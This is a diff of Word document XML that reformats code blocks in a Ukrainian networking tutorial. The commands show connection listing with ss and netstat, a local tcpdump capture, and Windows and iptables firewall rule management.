+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve"># Активні з'єднання</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Активні з'єднання</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">ss -tunapl</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Або через netstat</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">netstat -tunapl | grep ESTABLISHED</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Захоплення HTTP-трафіку</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo tcpdump -i eth0 port 80 -A | head -50</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">ss -tunapl</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Або через netstat</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">netstat -tunapl | grep ESTABLISHED</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Захоплення HTTP-трафіку</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sudo tcpdump -i eth0 port 80 -A | head -50</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="16"/>
     <w:bookmarkStart w:id="17" w:name="wireshark"/>
@@ -2002,188 +2320,249 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetFirewallRule | Where-Object Enabled -eq True |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Select-Object DisplayName, Direction, Action</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Створення правила: блокувати вхідні на порт 23 (Telnet)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Block Telnet" `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Direction Inbound `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -LocalPort 23 `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Protocol TCP `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Action Block</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Створення правила: дозволити вхідні на порт 443 (HTTPS)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Allow HTTPS" `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Direction Inbound `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -LocalPort 443 `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Protocol TCP `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Action Allow</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Видалення правила</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Remove-NetFirewallRule -DisplayName "Block Telnet"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перевірка статусу брандмауера</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetFirewallProfile | Select-Object Name, Enabled</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">Get-NetFirewallRule | Where-Object Enabled -eq True |</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Select-Object DisplayName, Direction, Action</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Створення правила: блокувати вхідні на порт 23 (Telnet)</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Block Telnet" `</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -Direction Inbound `</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -LocalPort 23 `</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -Protocol TCP `</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -Action Block</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Створення правила: дозволити вхідні на порт 443 (HTTPS)</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Allow HTTPS" `</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -Direction Inbound `</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -LocalPort 443 `</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -Protocol TCP `</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -Action Allow</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Видалення правила</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Remove-NetFirewallRule -DisplayName "Block Telnet"</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Перевірка статусу брандмауера</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Get-NetFirewallProfile | Select-Object Name, Enabled</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="19"/>
     <w:bookmarkStart w:id="20" w:name="linux-iptables"/>
@@ -2197,128 +2576,192 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -L -n -v</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Дозволити вхідні на порт 80 (HTTP)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Дозволити вхідні на порт 443 (HTTPS)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Заблокувати вхідні з конкретної IP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -s 10.0.0.100 -j DROP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Заборонити все інше (в кінці)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -j DROP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Зберегти правила</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables-save &gt; /etc/iptables.rules</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">sudo iptables -L -n -v</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Дозволити вхідні на порт 80 (HTTP)</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Дозволити вхідні на порт 443 (HTTPS)</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Заблокувати вхідні з конкретної IP</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sudo iptables -A INPUT -s 10.0.0.100 -j DROP</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Заборонити все інше (в кінці)</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sudo iptables -A INPUT -j DROP</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Зберегти правила</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sudo iptables-save &gt; /etc/iptables.rules</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="20"/>
     <w:bookmarkEnd w:id="21"/>
@@ -2357,152 +2800,204 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve"># Windows: перевірка прослуховуваних портів</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
